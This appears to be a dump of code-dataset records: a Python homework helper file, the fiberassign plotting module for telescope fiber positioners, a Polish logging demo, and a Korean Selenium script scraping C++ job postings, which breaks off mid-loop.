dictionary are the words in the input,\n and the values are the number of times the word appeared in the input.\n 
All keys are stored in lower case, \n and the case of the words in the original text is ignored.\n WARNING: \n Functions that output dictionaries need to be wrapped within the built-in\n pprint function for the doctests to work.\n This is because be default, python prints dictionaries in a\n non-deterministic ordering,\n but pprint ensures that the order is sorted alphabetically.\n For details, see https://stackoverflow.com/questions/15549429/how-do-i-test-dictionary-equality-with-pythons-doctest-package\n >>> pprint(count_words('a a B B B B c C a A a A ddDdd'))\n {'a': 6, 'b': 4, 'c': 2, 'ddddd': 1}\n '''\n import pprint\n lst = text.lower().split()\n compare = text.lower().split()\n results = {}\n i=0\n while i < len(lst):\n if lst[i] in compare:\n results[lst[i]] = results.get(lst[i], 0) + 1\n i += 1\n return results\n\ndef get_top_k_words(counts_dict,k):\n '''\n The counts_dict variable is a dictionary whose values are integers,\n and the k variable is an integer.\n The return value is another dictionary whose entries are the k entries\n of counts_dict with the largest values.\n HINT:\n Python has a built in function called nlargest within the heapq module.\n This function takes as input a list and returns the nth-largest value of the list.\n You can find detailed documentation at https://docs.python.org/2/library/heapq.html\n You can implement get_top_k_words by:\n Step 1: use heapq.nlargest to find the k-th largest value within counts_dict\n Step 2: remove all values in counts_dict less than the value from step 1\n WARNING:\n See the warning for count_words\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 1))\n {'a': 6}\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 2))\n {'a': 6, 'b': 4}\n >>> pprint(get_top_k_words({'b': 4, 'c': 2, 'a': 6, 'ddddd': 1}, 10))\n {'a': 6, 'b': 4, 'c': 2, 'ddddd': 1}\n '''\n import heapq\n heap = [(value, key) for key,value in counts_dict.items()]\n largest = dict(heapq.nlargest(k, heap))\n final_s = {v: x for x, v in largest.items()}\n return final_s\n\ndef print_dictionary(d):\n '''\n This function prints the keys and values of the dictionary with each key on its own line.\n EXTRA CREDIT:\n You can receive up to 5 points of extra credit on this problem by completing two tasks:\n First, print the keys sorted by value from highest to lowest.\n Second, ensure that all of the printed values are horizontally aligned.\n For example, the output like the following would earn the extra credit:\n laika : 33\n space : 21\n soviet : 19\n dogs : 16\n dog : 12\n sputnik : 12\n Output like the following is also acceptable for full credit, but would not earn extra credit:\n sputnik : 12\n space : 21\n dog : 12\n soviet : 19\n laika : 33\n dogs : 16\n '''\n import operator\n keys = list(d.keys())\n longest = ''\n for elem in keys:\n if len(elem) > len(longest):\n longest = elem\n j = 0\n sort = sorted(d.items())\n while j < len(sort):\n x = (len(longest) - len(sort[j][0]))\n print(sort[j][0], ' ' * x, ': ', sort[j][1])\n j += 1\n\n\n####################################TESTS########################################\nif __name__=='__main__':\n from pprint import pprint\n import doctest\n doctest.testmod(verbose=True)\n","sub_path":"Hws/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90490189","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n# -*- coding: utf-8 
-*-\n\"\"\"\nfiberassign.vis\n=======================\n\nVisualization tools.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport os\nimport warnings\n\nimport numpy as np\n\nimport multiprocessing as mp\nfrom functools import partial\n\nimport fitsio\n\nfrom ._internal import Shape\n\nfrom .utils import Logger, default_mp_proc\n\nfrom .hardware import load_hardware, FIBER_STATE_STUCK, FIBER_STATE_BROKEN\n\nfrom .tiles import load_tiles\n\nfrom .targets import (Targets, load_target_table,\n TARGET_TYPE_SCIENCE, TARGET_TYPE_SKY,\n TARGET_TYPE_SUPPSKY,\n TARGET_TYPE_STANDARD, TARGET_TYPE_SAFE)\n\nfrom .assign import (read_assignment_fits_tile, result_tiles, result_path,\n avail_table_to_dict)\n\nplt = None\n\ndef set_matplotlib_pdf_backend():\n \"\"\"Set the matplotlib backend to PDF.\n\n This is necessary to render high resolution figures.\n \"\"\"\n global plt\n if plt is not None:\n return\n try:\n import matplotlib\n matplotlib.use(\"pdf\")\n import matplotlib.pyplot as plt\n except ValueError:\n warnings.warn(\n \"\"\"Couldn't set the PDF matplotlib backend,\npositioner plots may be low resolution.\nProceeding with the default matplotlib backend.\"\"\"\n )\n import matplotlib.pyplot as plt\n\n\ndef plot_target_type_color(tgtype):\n color = \"gray\"\n tp = int(tgtype)\n if (tp & TARGET_TYPE_SAFE) != 0:\n color = \"black\"\n elif (tp & TARGET_TYPE_SKY) != 0:\n color = \"blue\"\n elif (tp & TARGET_TYPE_SUPPSKY) != 0:\n color = \"cyan\"\n elif (tp & TARGET_TYPE_STANDARD) != 0:\n color = \"gold\"\n if (tp & TARGET_TYPE_SCIENCE) != 0:\n color = \"green\"\n elif (tp & TARGET_TYPE_SCIENCE) != 0:\n color = \"red\"\n return color\n\n\ndef plot_positioner(ax, patrol_rad, loc, center, shptheta, shpphi, color=\"k\",\n linewidth=0.2):\n \"\"\"Plot one fiber positioner.\n \"\"\"\n set_matplotlib_pdf_backend()\n patrol = plt.Circle((center[0], center[1]), radius=patrol_rad, fc=color,\n ec=\"none\", alpha=0.1)\n ax.add_artist(patrol)\n # Plot the arm from the center to the body\n thetacent = shptheta.axis\n armwidth = 0.25\n armlen = np.sqrt((thetacent[1] - center[1])**2\n + (thetacent[0] - center[0])**2)\n armang = np.arctan2(thetacent[1] - center[1], thetacent[0] - center[0])\n sinarm = np.sin(armang)\n cosarm = np.cos(armang)\n arm_xoff = center[0] + (0.5*armwidth) * sinarm\n arm_yoff = center[1] - (0.5*armwidth) * cosarm\n armang_deg = armang * 180.0 / np.pi\n arm = plt.Rectangle((arm_xoff, arm_yoff), armlen, armwidth,\n angle=armang_deg, color=color, linewidth=2*linewidth,\n fill=False)\n ax.add_artist(arm)\n for piece in [shptheta, shpphi]:\n for circle in piece.circles:\n xcent, ycent = circle.center\n rad = circle.radius\n circ = plt.Circle((xcent, ycent), radius=rad, fc=\"none\", ec=color,\n linewidth=linewidth)\n ax.add_artist(circ)\n for segs in piece.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=linewidth, color=color)\n fontpix = armwidth * 2\n fontpt = int(0.25 * fontpix)\n fontpt = 2.0\n xtxt = center[0] - 2 * armwidth * cosarm\n ytxt = center[1] - 2 * armwidth * sinarm\n ax.text(xtxt, ytxt, \"{}\".format(loc),\n color='k', fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n # bbox=dict(fc='w', ec='none', pad=1, alpha=1.0))\n return\n\n\ndef plot_positioner_simple(ax, patrol_rad, loc, center, theta_ang, theta_arm,\n phi_ang, phi_arm, color=\"k\", linewidth=0.2):\n \"\"\"Plot one fiber positioner.\n\n This uses a simpler 
representation of the positioner geometry, in order to\n speed up the plotting.\n\n \"\"\"\n set_matplotlib_pdf_backend()\n patrol = plt.Circle((center[0], center[1]), radius=patrol_rad, fc=color,\n ec=\"none\", alpha=0.1)\n ax.add_artist(patrol)\n\n # Plot the arm from the center to the phi body\n theta_x = theta_arm * np.cos(theta_ang) + center[0]\n theta_y = theta_arm * np.sin(theta_ang) + center[1]\n\n ax.plot([center[0], theta_x], [center[1], theta_y], color=color,\n linewidth=5*linewidth)\n\n # Plot the phi arm.\n phi_x = phi_arm * np.cos(phi_ang + theta_ang) + theta_x\n phi_y = phi_arm * np.sin(phi_ang + theta_ang) + theta_y\n\n ax.plot([theta_x, phi_x], [theta_y, phi_y], color=color,\n linewidth=linewidth)\n\n fontpt = 2.0\n xtxt = center[0]\n ytxt = center[1] + 0.5\n ax.text(xtxt, ytxt, \"{}\".format(loc),\n color='k', fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n return\n\n\ndef plot_tile_targets_props(hw, tile_ra, tile_dec, tile_theta, tgs,\n avail_tgid=None):\n if avail_tgid is None:\n avail_tgid = tgs.ids()\n ra = np.full(len(avail_tgid), 9999.9, dtype=np.float64)\n dec = np.full(len(avail_tgid), 9999.9, dtype=np.float64)\n color = list()\n for idx, tgid in enumerate(avail_tgid):\n tg = tgs.get(tgid)\n ra[idx] = tg.ra\n dec[idx] = tg.dec\n color.append(plot_target_type_color(tg.type))\n # We disable threading here, since it does not interact well with\n # multiprocessing.\n\n tgxy = hw.radec2xy_multi(tile_ra, tile_dec, tile_theta, ra, dec, False, 1)\n props = {tgid: {\"xy\": xy, \"color\": cl} for tgid, xy, cl\n in zip(avail_tgid, tgxy, color)}\n\n return props\n\n\ndef plot_available(ax, targetprops, selected, linewidth=0.1):\n mwidth = 5.0 * linewidth\n xdata = np.full(len(selected), 9999.9, dtype=np.float64)\n ydata = np.full(len(selected), 9999.9, dtype=np.float64)\n color = list()\n for idx, tgid in enumerate(selected):\n xdata[idx] = targetprops[tgid][\"xy\"][0]\n ydata[idx] = targetprops[tgid][\"xy\"][1]\n color.append(targetprops[tgid][\"color\"])\n ax.scatter(xdata, ydata, color=color, marker=\".\",\n linewidth=linewidth, s=mwidth)\n return\n\n\ndef plot_assignment(ax, hw, targetprops, tile_assigned, linewidth=0.1,\n real_shapes=False):\n log = Logger.get()\n center_mm = hw.loc_pos_curved_mm\n theta_arm = hw.loc_theta_arm\n phi_arm = hw.loc_phi_arm\n theta_offset = hw.loc_theta_offset\n theta_min = hw.loc_theta_min\n theta_max = hw.loc_theta_max\n theta_pos = hw.loc_theta_pos\n phi_offset = hw.loc_phi_offset\n phi_min = hw.loc_phi_min\n phi_max = hw.loc_phi_max\n phi_pos = hw.loc_phi_pos\n state = hw.state\n loc_petal = dict(hw.loc_petal)\n device_type = dict(hw.loc_device_type)\n assigned = np.array(sorted(tile_assigned.keys()), dtype=np.int32)\n\n # Plot GFA / Petal edges. 
Only plot one shape per petal, although\n # the code formally allows unique petal / GFA boundaries per device.\n\n if len(assigned) > 0:\n edge_gfa = dict()\n edge_petal = dict()\n for loc in assigned:\n pt = loc_petal[loc]\n if pt not in edge_gfa:\n edge_gfa[pt] = hw.loc_gfa_excl[loc]\n edge_petal[pt] = hw.loc_petal_excl[loc]\n for pt, shp in edge_gfa.items():\n for segs in shp.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=0.2*linewidth, color=\"gray\")\n for pt, shp in edge_petal.items():\n for segs in shp.segments:\n xpts = np.array([p[0] for p in segs.points])\n ypts = np.array([p[1] for p in segs.points])\n ax.plot(xpts, ypts, linewidth=0.2*linewidth, color=\"gray\")\n\n for lid in assigned:\n color = \"gray\"\n if (device_type[lid] != \"POS\") and (device_type[lid] != \"ETC\"):\n continue\n shptheta = Shape()\n shpphi = Shape()\n theta = None\n phi = None\n center = center_mm[lid]\n tgid = tile_assigned[lid]\n patrol_rad = theta_arm[lid] + phi_arm[lid]\n failed = False\n is_assigned = (tgid >= 0)\n if is_assigned:\n # This fiber is assigned. Plot the positioner located at the\n # assigned target.\n failed = hw.loc_position_xy(lid, targetprops[tgid][\"xy\"],\n shptheta, shpphi)\n if failed:\n msg = \"Positioner at location {} cannot move to target {} at (x, y) = ({}, {}). This should have been dected during assignment!\".format(lid, tgid, targetprops[tgid][\"xy\"][0], targetprops[tgid][\"xy\"][1])\n log.warning(msg)\n raise RuntimeError(msg)\n is_assigned = False\n failed = False\n else:\n color = targetprops[tgid][\"color\"]\n theta, phi = hw.xy_to_thetaphi(\n center, targetprops[tgid][\"xy\"],\n theta_arm[lid], phi_arm[lid],\n theta_offset[lid], phi_offset[lid],\n theta_min[lid], phi_min[lid],\n theta_max[lid], phi_max[lid],\n )\n if not is_assigned:\n # This fiber is unassigned.\n if (state[lid] & FIBER_STATE_STUCK) or (state[lid] & FIBER_STATE_BROKEN):\n # The positioner is stuck or fiber broken. Plot it at its current\n # location.\n theta = theta_pos[lid]\n phi = phi_pos[lid]\n print(\"loc {}, state {} is stuck / broken, using {} / {}\".format(\n lid, state[lid], theta, phi\n ), flush=True)\n failed = hw.loc_position_thetaphi(\n lid, theta_pos[lid], phi_pos[lid], shptheta, shpphi\n )\n else:\n # Plot the positioner in its home\n # position with theta at its minimum value and phi\n # at 180 degrees.\n theta = theta_offset[lid] + theta_min[lid]\n phi = phi_offset[lid] + phi_max[lid]\n if phi > np.pi:\n phi = np.pi\n print(\"loc {}, state {} is unassigned, using {} / {}\".format(\n lid, state[lid], theta, phi\n ), flush=True)\n failed = hw.loc_position_thetaphi(lid, theta, phi, shptheta, shpphi)\n if failed:\n msg = \"Positioner at location {} cannot move to its stuck or home position. 
This should never happen!\".format(lid)\n log.warning(msg)\n if not failed:\n if real_shapes:\n plot_positioner(\n ax, patrol_rad, lid, center, shptheta, shpphi,\n color=color, linewidth=linewidth\n )\n else:\n plot_positioner_simple(\n ax, patrol_rad, lid, center, theta, theta_arm[lid], phi,\n phi_arm[lid], color=color, linewidth=linewidth\n )\n return\n\n\nplot_assignment_tile_file_hw = None\n\n\ndef plot_assignment_tile_file_initialize(hw):\n global plot_assignment_tile_file_hw\n plot_assignment_tile_file_hw = hw\n return\n\n\ndef plot_assignment_tile_file(locs, real_shapes, params):\n (tile_id, tile_ra, tile_dec, tile_theta, infile, outfile) = params\n set_matplotlib_pdf_backend()\n log = Logger.get()\n\n if os.path.isfile(outfile):\n log.info(\"Skipping existing plot {}\".format(outfile))\n return\n else:\n log.info(\"Creating {}\".format(outfile))\n\n header, fiber_data, targets_data, avail_data, gfa_data = \\\n read_assignment_fits_tile((tile_id, infile))\n\n tavail = avail_table_to_dict(avail_data)\n\n log.debug(\" tile {} at RA/DEC {} / {} with rotation {}\".format(\n tile_id, tile_ra, tile_dec, tile_theta)\n )\n\n fig = plt.figure(figsize=(12, 12))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_aspect(\"equal\")\n\n # Target properties (x, y, color) for plotting\n tgs = Targets()\n if \"FA_SURV\" in header:\n load_target_table(tgs, targets_data,\n survey=str(header[\"FA_SURV\"]).rstrip(),\n typecol=\"FA_TYPE\")\n else:\n load_target_table(tgs, targets_data)\n\n targetprops = plot_tile_targets_props(plot_assignment_tile_file_hw,\n tile_ra, tile_dec, tile_theta, tgs)\n\n log.debug(\" tile {} has {} targets with properties\"\n .format(tile_id, len(targets_data)))\n\n # When plotting available targets, we only consider those which have\n # RA/DEC information. 
Depending on how the assignment was written out,\n # this might include only assigned targets or all targets available to\n # the tile.\n\n # Available targets for our selected fibers.\n avtg_locs = [f for f in locs if f in tavail]\n avtg_ids = np.unique([x for f in avtg_locs for x in tavail[f]])\n\n # Downselect to include only targets with properties in the file.\n avtg = avtg_ids[np.isin(avtg_ids, targets_data[\"TARGETID\"],\n assume_unique=True)]\n\n plot_available(ax, targetprops, avtg, linewidth=0.1)\n\n # Assigned targets for our selected fibers\n tassign = {x[\"LOCATION\"]: x[\"TARGETID\"] for x in fiber_data\n if (x[\"LOCATION\"] in locs)}\n\n log.debug(\" tile {} plotting {} assigned fibers\"\n .format(tile_id, len(tassign)))\n\n fassign = {f: tassign[f] if f in tassign else -1 for f in locs}\n\n plot_assignment(ax, plot_assignment_tile_file_hw, targetprops, fassign,\n linewidth=0.1, real_shapes=real_shapes)\n\n ax.set_xlabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n ax.set_ylabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n plt.close()\n return\n\n\ndef plot_tiles(hw, tiles, result_dir=\".\", result_prefix=\"fiberassign-\",\n result_split_dir=False, plot_dir=\".\",\n plot_prefix=\"fiberassign-\",\n plot_split_dir=False, petals=None, real_shapes=False,\n serial=False):\n \"\"\"Plot assignment output.\n\n Args:\n hw (Hardware): the hardware description.\n tiles (Tiles): a Tiles object.\n result_dir (str): Top-level directory of fiberassign results.\n result_prefix (str): Prefix of each per-tile file name.\n result_split_dir (bool): Results are in split tile directories.\n plot_dir (str): Top-level directory for plots.\n plot_prefix (str): Prefix of each per-tile output file name.\n plot_split_dir (bool): Write outputs in split tile directories.\n petals (list): List of petals to plot.\n real_shapes (bool): If True, plot the full positioner shapes.\n serial (bool): If True, disable use of multiprocessing.\n\n Returns:\n None.\n\n \"\"\"\n log = Logger.get()\n\n foundtiles = result_tiles(dir=result_dir, prefix=result_prefix)\n\n log.info(\"Found {} fiberassign tile files\".format(len(foundtiles)))\n\n locs = None\n if petals is None:\n locs = [x for x in hw.locations]\n else:\n locs = list()\n for p in petals:\n locs.extend([x for x in hw.petal_locations[p]])\n locs = np.array(locs)\n\n plot_tile = partial(plot_assignment_tile_file, locs, real_shapes)\n\n tiles_id = tiles.id\n tiles_order = tiles.order\n tiles_ra = tiles.ra\n tiles_dec = tiles.dec\n tiles_theta = tiles.obstheta\n\n avail_tiles = np.array(tiles_id)\n select_tiles = [x for x in foundtiles if x in avail_tiles]\n\n tile_map_list = [(x, tiles_ra[tiles_order[x]], tiles_dec[tiles_order[x]],\n tiles_theta[tiles_order[x]],\n result_path(x, dir=result_dir, prefix=result_prefix,\n split=result_split_dir),\n result_path(x, dir=plot_dir, prefix=plot_prefix,\n ext=\"pdf\", create=True,\n split=plot_split_dir))\n for x in select_tiles]\n\n log.info(\"Selecting {} fiberassign tile files\".format(len(tile_map_list)))\n\n if serial:\n plot_assignment_tile_file_initialize(hw)\n for params in tile_map_list:\n plot_tile(params)\n else:\n with mp.Pool(processes=default_mp_proc,\n initializer=plot_assignment_tile_file_initialize,\n initargs=(hw,)) as pool:\n pool.map(plot_tile, tile_map_list)\n\n return\n\n\ndef plot_assignment_tile(hw, tgs, tile_id, tile_ra, tile_dec, tile_theta,\n tile_assign, tile_avail=None, petals=None,\n real_shapes=False, outfile=None, 
figsize=8):\n set_matplotlib_pdf_backend()\n # Get selected fibers\n locs = None\n if petals is None:\n locs = [x for x in hw.locations]\n else:\n locs = list()\n for p in petals:\n locs.extend([x for x in hw.petal_locations[p]])\n locs = np.array(locs)\n\n # Available targets for our selected fibers.\n avtg_locs = None\n avtg_ids = None\n if tile_avail is None:\n # Just plot assigned targets\n avtg_locs = [f for f in locs if f in tile_assign]\n avtg_ids = [tile_assign[f] for f in avtg_locs]\n else:\n # Plot all available targets\n avtg_locs = [f for f in locs if f in tile_avail]\n avtg_ids = np.unique([x for f in avtg_locs for x in tile_avail[f]])\n\n # Target properties\n targetprops = plot_tile_targets_props(hw, tile_ra, tile_dec, tile_theta,\n tgs, avail_tgid=avtg_ids)\n\n fig = plt.figure(figsize=(figsize, figsize))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_aspect(\"equal\")\n\n plot_available(ax, targetprops, avtg_ids, linewidth=0.1)\n\n # Assigned targets for our selected fibers\n tassign = {x: tile_assign[x] for x in locs if x in tile_assign}\n\n fassign = {f: tassign[f] if f in tassign else -1 for f in locs}\n\n plot_assignment(ax, hw, targetprops, fassign,\n linewidth=0.1, real_shapes=real_shapes)\n\n ax.set_xlabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n ax.set_ylabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n if outfile is None:\n plt.show()\n else:\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n plt.close()\n return\n\n\ndef plot_qa_tile_color(desired, value, incr):\n des_color = \"green\"\n low_one_color = \"gold\"\n low_two_color = \"red\"\n low_color = \"black\"\n high_color = \"cyan\"\n if value == desired:\n return des_color\n if value > desired:\n return high_color\n if value < (desired - 2 * incr):\n return low_color\n if value < (desired - incr):\n return low_two_color\n return low_one_color\n\n\ndef plot_qa(data, outroot, outformat=\"pdf\", labels=False):\n \"\"\"Make plots of QA data.\n \"\"\"\n set_matplotlib_pdf_backend()\n # Imported here, to ensure that the backend has been set.\n from matplotlib.patches import Patch\n\n hw = load_hardware()\n tile_radius = hw.focalplane_radius_deg\n\n fontpt = 1\n linewidth = 0.1\n\n fig = plt.figure(figsize=(12, 10))\n\n plot_param = [\n (\"Total Fibers Assigned Per Tile\", [\"assign_total\"], 5000, 5),\n (\"Standards Assigned Per Tile\", [\"assign_std\"], 100, 2),\n (\"Sky Assigned Per Tile\", [\"assign_sky\", \"assign_suppsky\"], 400, 2),\n ]\n\n pindx = 1\n for title, key, desired, incr in plot_param:\n ax = fig.add_subplot(3, 1, pindx)\n ax.set_aspect(\"equal\")\n xmin = 360.0\n xmax = 0.0\n ymin = 90.0\n ymax = -90.0\n for tid, props in data.items():\n xcent = props[\"tile_ra\"]\n ycent = props[\"tile_dec\"]\n if xcent > xmax:\n xmax = xcent\n if xcent < xmin:\n xmin = xcent\n if ycent > ymax:\n ymax = ycent\n if ycent < ymin:\n ymin = ycent\n keytot = np.sum([props[x] for x in key])\n color = plot_qa_tile_color(desired, keytot, incr)\n circ = plt.Circle((xcent, ycent), radius=tile_radius, fc=\"none\",\n ec=color, linewidth=linewidth)\n ax.add_artist(circ)\n if labels:\n ax.text(xcent, ycent, \"{}\".format(tid),\n color=color, fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n\n margin = 1.1 * tile_radius\n\n xmin -= margin\n xmax += margin\n ymin -= margin\n ymax += margin\n if xmin < 0.0:\n xmin = 0.0\n if xmax > 360.0:\n xmax = 360.0\n if ymin < -90.0:\n ymin = -90.0\n if ymax > 90.0:\n ymax = 90.0\n\n ax.set_xlim(left=xmin, right=xmax)\n 
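# plot_qa_tile_color above buckets a per-tile assignment count into color bands
# around the desired total. A standalone restatement of those bands, using
# desired=100 and incr=2 as sample thresholds; qa_color is a local copy for
# illustration only.
def qa_color(desired, value, incr):
    if value == desired:
        return "green"  # exactly on target
    if value > desired:
        return "cyan"  # above target
    if value < desired - 2 * incr:
        return "black"  # far below target
    if value < desired - incr:
        return "red"  # within two increments below
    return "gold"  # within one increment below

assert qa_color(100, 100, 2) == "green"
assert qa_color(100, 101, 2) == "cyan"
assert qa_color(100, 99, 2) == "gold"
assert qa_color(100, 97, 2) == "red"
assert qa_color(100, 90, 2) == "black"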
ax.set_ylim(bottom=ymin, top=ymax)\n ax.set_xlabel(\"RA (degrees)\", fontsize=\"large\")\n ax.set_ylabel(\"DEC (degrees)\", fontsize=\"large\")\n ax.set_title(title)\n\n c_high = plot_qa_tile_color(desired, desired+1, incr)\n c_exact = plot_qa_tile_color(desired, desired, incr)\n c_low_one = plot_qa_tile_color(desired, desired-incr, incr)\n c_low_two = plot_qa_tile_color(desired, desired-2*incr, incr)\n c_low = plot_qa_tile_color(desired, 0, incr)\n\n c_low_two_val = desired - incr\n c_low_val = desired - 2 * incr\n\n legend_elements = [\n Patch(facecolor=c_high, edgecolor=\"none\",\n label=\"> {} assigned\".format(desired)),\n Patch(facecolor=c_exact, edgecolor=\"none\",\n label=\"Exactly {} assigned\".format(desired)),\n Patch(facecolor=c_low_one, edgecolor=\"none\",\n label=\"< {} assigned\".format(desired)),\n Patch(facecolor=c_low_two, edgecolor=\"none\",\n label=\"< {} assigned\".format(c_low_two_val)),\n Patch(facecolor=c_low, edgecolor=\"none\",\n label=\"< {} assigned\".format(c_low_val)),\n ]\n ax.legend(handles=legend_elements, loc=\"best\",\n fontsize=\"x-small\")\n pindx += 1\n\n outfile = \"{}.{}\".format(outroot, outformat)\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n\n return\n","sub_path":"py/fiberassign/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"165314000","text":"import logging\n\nlogging.basicConfig(\n level=logging.WARNING,\n format='[%(asctime).19s] [%(levelname)s] %(message)s',\n)\n\nlog = logging.getLogger(__name__)\n\n# logging.critical('Błąd Krytyczny')\n# logging.error('Bład')\n# logging.warning('Uwaga')\n# logging.info('Informacja')\n# logging.debug('Debug')\n\n\nlogging.warning('Rozpoczynam program')\n\nlogging.info('Teraz będzie sekcja odnośnie wyświeltnia napisów')\n\n\ndef wyswietlanie_napisow(tekst):\n wynik = (tekst + ', ') * 5\n logging.debug('Zmienne lokalne: %s' % locals())\n logging.info('wynik: %s' % wynik)\n logging.debug('Wychodzę z funkcji')\n return wynik\n\n\nwyswietlanie_napisow('Hello Wold')\n\nlogging.warning('Kończę program')\n\n\ndef asd():\n import warnings\n warnings.warn('Uważaj, z tego już nie korzystaj', PendingDeprecationWarning)\n\n\nasd()\n","sub_path":"bin/podstawy/logownaie.py","file_name":"logownaie.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282448715","text":"import pandas as pd\r\nimport math\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport time\r\nfrom selenium.common.exceptions import NoSuchElementException, InvalidSessionIdException\r\nfrom selenium.webdriver import ActionChains\r\n\r\n# ================================사용자 직접 검색 시 필요=====================================\r\n\r\n# search_data = input('검색어를 입력해주세요: ') # 사용자한테 검색어 받을 경우 활성화\r\n\r\n# ================================= 검색 진행 ================================================\r\n\r\nurl = 'https://www.saramin.co.kr/zf_user/' # 메인페이지\r\ndriver = webdriver.Chrome('chromedriver.exe')\r\ndriver.get(url) # 메인페이지 호출\r\n\r\ntry:\r\n WebDriverWait(driver,5).until(\r\n EC.presence_of_all_elements_located((By.ID, 'search_open'))) # 메인페이지 로딩 대기 - 검색창\r\n\r\nexcept Exception as e:\r\n print(e, '페이지 로딩시간 초과')\r\n 
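# The logging snippet above configures basicConfig(level=logging.WARNING), so
# its info() and debug() calls emit nothing. A minimal self-contained
# illustration of that level filtering:
import logging

logging.basicConfig(level=logging.WARNING, format='[%(levelname)s] %(message)s')
logging.warning('emitted')  # WARNING >= WARNING, shown
logging.info('suppressed')  # INFO < WARNING, filtered out
logging.debug('suppressed')  # DEBUG < WARNING, filtered out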
\r\n    driver.close()\r\n\r\ntime.sleep(1)\r\ndriver.find_element_by_id('search_open').click() # open the search box\r\ndriver.find_element_by_id('ipt_keyword_recruit').clear() # clear the search box placeholder text\r\n\r\n# driver.find_element_by_id('ipt_keyword_recruit').send_keys(search_data) # type the search term (needed only when the user enters it)\r\n\r\ntime.sleep(1)\r\nsearch_key = 'C++'\r\ndriver.find_element_by_id('ipt_keyword_recruit').send_keys(search_key) # send the search key\r\ndriver.find_element_by_css_selector('button#btn_search_recruit').click() # click the search button\r\n\r\n# ================================= after searching, wait for the page and check whether any job postings exist ==============\r\n\r\ntry:\r\n    WebDriverWait(driver,5).until(\r\n        EC.presence_of_all_elements_located((By.ID, 'recruit_info_list'))) # wait for the results page to load\r\n    error = ' '\r\nexcept Exception as e:\r\n    error = f'No job postings to collect for {search_key}.'\r\n    print(error)\r\n\r\ntime.sleep(1)\r\n\r\nif 'No job postings' in error: # error handling when there are no job postings\r\n    pass\r\nelse:\r\n    try:\r\n        driver.find_element_by_css_selector('#content > ul.tab_search_result.on > li:nth-child(2) > a').click() # click the job postings tab\r\n\r\n    except NoSuchElementException as e:\r\n        print(f'No job postings to collect for {search_key}.')\r\n\r\n\r\n\r\n    # =================================== extract the total number of job postings ===============================================\r\n\r\n    time.sleep(2)\r\n    try:\r\n        total = int(driver.find_element_by_css_selector('span.cnt_result').text[2:-1].replace(',','')) # total posting count shown on the results page\r\n        total_page = math.ceil(total/40) # number of pages (total postings / postings shown per page)\r\n        \r\n        # =================================== start crawling ==============================================\r\n\r\n        try:\r\n            result = [] # initialize result storage\r\n            jobs_num = 0\r\n            print(f'{\"=\"*10} starting to collect {search_key} job postings {\"=\"*10}')\r\n            for page in range(1,total_page+1): # step through the pages automatically\r\n                if page != 1: # from page 2 on, click through the pager\r\n                    driver.find_element_by_xpath(f'//a[@page={page}]').click()\r\n                    time.sleep(2)\r\n                \r\n                jobs = driver.find_elements_by_css_selector('#recruit_info_list .item_recruit') # extract the list of postings\r\n                jobs_num += len(jobs)\r\n                \r\n                print(f'collecting page {page} [{page}/{total_page}][{jobs_num} collected in total]') # progress display {round(((page)/total_page),3)*100}%\r\n                for i in jobs:\r\n                    title = i.find_element_by_css_selector('h2.job_tit').text # posting title\r\n                    title_ = i.find_element_by_css_selector('h2.job_tit')\r\n                    career = list(i.find_element_by_css_selector('div.job_condition').text.split('\\n'))[1].replace('↑','') # required experience\r\n                    station = list(i.find_element_by_css_selector('div.job_condition').text.split('\\n'))[0] # location\r\n                    date = i.find_element_by_css_selector('span.date').text.replace('~','') # posting date\r\n                    company = i.find_element_by_css_selector('div.area_corp a.data_layer').text # company name\r\n                    link = i.find_element_by_css_selector('a.data_layer').get_attribute('href') # posting link\r\n                    work_lst = i.find_elements_by_css_selector('div.job_sector a')\r\n                    work_lst_2 = []\r\n                    for work in work_lst: # split out the job-category data \r\n                        work_lst_2.append(work.text)\r\n                    machul = i.find_element_by_css_selector('div.area_corp_info') # locate the company-info element\r\n                    ActionChains(driver).move_to_element(machul).perform() # mouse over the company-info element\r\n                    lst = [] # revenue, initialized empty\r\n                    lst_1 = []# company address, initialized empty\r\n                    machul_lst = machul.find_elements_by_css_selector('div.area_btn table > tbody > tr') # company-info table rows\r\n                    for i in machul_lst: # extract revenue ('매출액') and address ('주소')\r\n                        if '매출액' in i.text:\r\n                            i = i.text.split()\r\n                            for won in i:\r\n                                if '억' in won or '만원' in won: # keep only the amount, dropping the year note\r\n                                    lst.append(won)\r\n\r\n                        elif '주소' in i.text: \r\n                            i = i.text.split()\r\n                            for gu in i:\r\n                                if '구' in gu and i.index(gu)!=1: # keep the address only down to the district (gu)\r\n                                    lst_1.append(i[1:i.index(gu)+1])\r\n                                    break    \r\n                        else:\r\n     